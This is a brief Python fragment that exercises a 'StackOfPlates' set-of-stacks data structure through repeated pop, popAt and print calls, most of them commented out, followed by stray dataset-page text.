# print(StackOfPlates.set_of_stacks)
# StackOfPlates.pop()
# print(StackOfPlates.set_of_stacks)
# StackOfPlates.pop()
# print(StackOfPlates.set_of_stacks)
# StackOfPlates.pop()
# print(StackOfPlates.set_of_stacks)
# StackOfPlates.pop()
# print(StackOfPlates.set_of_stacks)
# StackOfPlates.pop()
# print(StackOfPlates.set_of_stacks)
# StackOfPlates.pop()
# StackOfPlates.popAt(2)
# print(StackOfPlates.set_of_stacks)
StackOfPlates.popAt(0)
print(StackOfPlates.set_of_stacks)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.